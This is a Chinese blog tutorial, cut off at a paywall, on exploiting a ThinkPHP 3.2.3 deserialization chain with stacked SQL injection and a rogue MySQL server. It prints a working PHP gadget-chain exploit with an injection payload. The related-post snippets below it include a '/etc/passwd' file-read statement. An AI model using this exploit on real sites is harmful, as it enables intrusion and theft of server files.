「网络安全」如何搭建MySQL恶意服务器读取文件?(1)

于 2024-04-27 00:04:44 发布
阅读量575 收藏 30
点赞数 26
文章标签: web安全 mysql 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84254087/article/details/138234462
版权
文章介绍了如何在ThinkPHP框架中利用堆叠注入技术,通过构造恶意链,获取数据库信息并实现getshell。作者演示了如何构建恶意MySQL服务,以及如何在不同阶段修改链子以适应远程目标。此技术可用于网络安全教育和防御策略讨论。
摘要由CSDN通过智能技术生成

具体的链子,我就不跟了,网上也有很多,虽然链子具体的方法不跟进,但是我还是需要介绍一下这条链子能起到一个什么作用。

  1. 首先需要一个反序列化入口,这是毋庸置疑的,没有反序列化入口,那就无法进行反序列化,所以上方我就在HelloController控制器中自己写了一个反序列化入口;
  2. 这条链子最终的链尾是需要数据库的相关信息,例如数据库名,数据库端口,数据库用户以及密码,并且这条链子是允许使用堆叠注入的,因此如果知道数据库相关信息,那么就可以利用堆叠注入写入一句话木马进而getshell。

这里我就直接将链子放出来,然后演示一下如何搭建一个恶意的MySQL数据库,获取敏感文件,进而getshell。

<?php
namespace Think\Db\Driver{
use PDO;
class Mysql{
protected $options = array(
PDO::MYSQL_ATTR_LOCAL_INFILE => true    // 开启才能读取文件
);
protected $config = array(
"debug"    => 1,
"database" => "tp323",
"hostname" => "127.0.0.1",
"hostport" => "8889",
"charset"  => "utf8",
"username" => "root",
"password" => "root"
);
}
}

namespace Think\Image\Driver{
use Think\Session\Driver\Memcache;
class Imagick{
private $img;

public function __construct(){
$this->img = new Memcache();
}
}
}

namespace Think\Session\Driver{
use Think\Model;
class Memcache{
protected $handle;

public function __construct(){
$this->handle = new Model();
}
}
}

namespace Think{
use Think\Db\Driver\Mysql;
class Model{
protected $options   = array();
protected $pk;
protected $data = array();
protected $db = null;

public function __construct(){
$this->db = new Mysql();
$this->options['where'] = '';
$this->pk = 'id';
$this->data[$this->pk] = array(
"table" => "tp_user where 1=updatexml(1,concat(0x7e,version(),0x7e),1)#",
"where" => "1=1"
);
}
}
}

namespace {
echo base64_encode(serialize(new Think\Image\Driver\Imagick()));
}

上方链子中的数据库信息为我本地的数据库信息,执行该文件后,得到序列化字符串如下:

TzoyNjoiVGhpbmtcSW1hZ2VcRHJpdmVyXEltYWdpY2siOjE6e3M6MzE6IgBUaG
最低0.47元/天 解锁文章
2401_84254087
关注
5-2 MySQL数据库读取外部文件
weixin_43263566的博客
10-19 724
MySQL数据库读取外部文件
网络安全最全「网络安全」如何搭建MySQL恶意服务器读取文件
最新发布
2401_84252743的博客
05-04 964
这个时候可能就会绕不清楚,什么是服务端,什么是客户端?因为一般情况下,调试SQL都是在本机,并且数据库也在本机,这样的情况就导致,客户端和服务端都是在本地,有点难区分,下面我用一张图来简述。在本地,由于客户端和服务端都是在同一个磁盘下,因此,在本地,无论是否加local都是可以将文件传入数据库的,而后面讲到利用MySQL恶意服务器读取文件的漏洞,就是需要使用local,来达到将文件带出的目的。
网络安全」如何搭建MySQL恶意服务器读取文件
weixin_55154866的博客
09-13 74
注:本文不涉及对MySQL协议报文研究,仅讲解原理,并且做部分演示。搭建MySQL恶意服务器读取文件这件事,虽然直接利用门槛较高,但是由于在网上看到了一种比较新颖的利用方式(利用社会工程学引诱用户连接MySQL进而读取用户文件),个人觉得比较有意思,总结了一下攻击原理以及攻击方式,因此就有了这篇文章。
恶意软件感染 MySQL 服务器,成为全球 DDoS 之一
weixin_34122548的博客
06-05 226
赛门铁克已经发现攻击者使用恶意软件劫持MySQL服务器,将其加入全球DDoS僵尸网络,进而发动DDoS攻击。据赛门铁克公司介绍,攻击者可以利用SQL注入(仍未经证实的),使用一个特制的UDF(用户定义函数)文件感染MySQL服务器,然后在服务器上保存Downloader.Chikdos木马。 由于UDF文件可以让MySQL服务器启动更复杂的操作,而普通的...
MySQL服务恶意读取客户端文件漏洞 (DDCTF2019和国赛均涉及到这个漏洞)
weixin_30698297的博客
05-06 557
mysql协议中流程和go语言实现的恶意mysql服务器:https://blog.csdn.net/ls1120704214/article/details/88174003 poc :https://github.com/allyshka/Rogue-MySql-Server 简单的原理:http://aq.mk/index.php/archives/23/ 今天实验了好久,直到最后一次...
mysql 服务器攻击_攻击MySQL服务器传播GandCrab勒索软件
weixin_30578645的博客
01-19 383
研究人员在实验室环境中搭建了一个蜜罐系统,监听着SQL服务器使用的默认端口(TCP/3306端口)。该蜜罐系统发现来自美国机器的攻击。研究人员监控了僵尸网络生成的网络流量和行为,发现该 Linux 蜜罐下载了一个Windows可执行文件。 攻击者首先用SQL数据库命令在上传helper DLL到服务器,然后作为 数据库 函数调用该DLL来提取IP地址位于加拿大魁北克省的主机上的GandCrab p...
网络安全】如何搭建MySQL恶意服务器读取文件
HBohan的博客
04-08 390
前言 注:本文不涉及对MySQL协议报文研究,仅讲解原理,并且做部分演示。 搭建MySQL恶意服务器读取文件这件事,虽然直接利用门槛较高,但是由于在网上看到了一种比较新颖的利用方式(利用社会工程学引诱用户连接MySQL进而读取用户文件),个人觉得比较有意思,总结了一下攻击原理以及攻击方式,因此就有了这篇文章。 原理 在阐述具体原理之前,先介绍几个SQL语句,以便后文理解 首先在tmp目录下新建一个tmp.txt 内容如下: 然后执行下方SQL语句,即可将tmp.txt文件导入其中: mysql>
mysql-connector-java-8.0.28 mysql恶意服务器jdbc反序列化失败原因
azraelxuemo的博客
12-08 799
mysql-connector-java-8.0.28 mysql恶意服务器jdbc反序列化失败原因
MySQL设计Bug允许恶意服务器从客户端窃取文件
weixin_33834910的博客
01-23 138
客户端主机和MySQL服务器之间的文件传输交互中的设计缺陷允许运行恶意MySQL服务器的***者访问连接的客户端具有读取访问权限的任何数据。不法分子可以利用此问题从配置不当的web服务器(允许连接到不受信任的服务器)或数据库管理应用程序检索敏感信息。安全问题根源问题出在与本地修饰符一起使用的LOAD DATA语句上,该语句在MySQL文档中被引用为安全风险。开发人员对此的解释...
mysql读取文件或目录_mysql几种读取文件方法的使用
weixin_32716541的博客
01-25 2610
mysql数据库在渗透过程中能够使用的功能还是比较多的,除了读取数据之外,还可以进行对文件进行读写(但前提是权限足够)总结下mysql在不同版本读取文件方法大致有这3个:1.load_file()2.load data infile()3.system catload_file()和load data infile读取文件的方法为:新建一个表,读取文件为字符串形式插入表中,然后读出表中数据。但是通...
MySQL服务端读取客户端_MySQL服务恶意读取客户端文件漏洞分析并使用Golang编写简易蜜罐...
weixin_29751415的博客
02-28 326
MySQL读取客户端文件漏洞分析并使用Golang编写简易蜜罐一、 原理概述这并不是一个新鲜的漏洞,我也是为了学习Golang才又拿出来炒一遍冷饭。先大概说一下原理,MySQL客户端和服务端通信过程中是通过对话的形式来实现的,客户端发送一个操作请求,然后服务端根据客服端发送的请求来响应客户端,在这个过程中客户端如果一个操作需要两步才能完成那么当它发送完第一个请求过后并不会存储这个请求,而是直接就丢...
Mysql之查看服务器系统文件配置--yellowcong
01-20 836
Mysql中可以通过load_file这个函数来获取mysql服务器上的文件的信息,也可以通过 into outfile来写出到目标服务器,这样的话,就非常的爽了。解决这个问题,我们可以通过防止注入的方式拼接mysql,恶如表示通过字符串 的方式来拼接命令,第二种方式,配置mysql用户的权限 通过命令查看系统文件-- 直接输入字符串到 文件中 select 'doubi' into outfile
获取服务器mysql目录_获取当前服务器目录文件
weixin_34327476的博客
01-19 182
String path= this.getServletContext().getRealPath("") +request.getRequestURI().substring(request.getContextPath().length());(request.getContextPath()是项目名 所以uri里面需要去掉项目名 this.getServletContext().getRe...
mysql udf提权_攻击 Mysql 服务
weixin_39792751的博客
12-05 170
作者:Micropoor链接:https://micropoor.blogspot.commsf 内置关于mysql插件如下(部分非测试mysql 插件)关于msf常用攻击mysql插件如下:1.auxiliary/scanner/mysql/mysql_login2.exploit/multi/mysql/mysql_udf_payload3.exploit/windows/mysql...
mysql对本地文件的读取_Mysql 任意读取客户端文件
weixin_31221157的博客
01-19 1553
load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';实现:Mysql Server会读取服务端的/etc/passwd,然后将其数据按照'\n'分割插入表中,但现在这个语句同样要求你有FILE权限,以及非local加载的语句也受到secure_file_priv的限制流程的话是: 客户端 读取 服务端本地...
网络安全】漏洞复现有多少种方式?
kali_Ma的博客
09-03 889
0x00 $this->show 造成命令执行 2021最新整理网络安全\渗透测试/安全学习(全套视频、大厂面经、精品手册、必备工具包)一>点我获取<一 在 Home\Controller\IndexController 下的index中传入了一个可控参数,跟进调试看一下。 class IndexController extends Controller { public function index($n='') { $this->show('&l.
Apache+MySQL+PHP安全配置完全指南
10. 禁止文件系统访问:防止MySQL读取或写入系统文件。 11. 权限控制:细粒度的权限分配,只赋予必要的操作权限。 12. chroot环境:通过chroot将MySQL服务限制在特定目录,增加安全性。 13. 数据库备份:定期备份,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值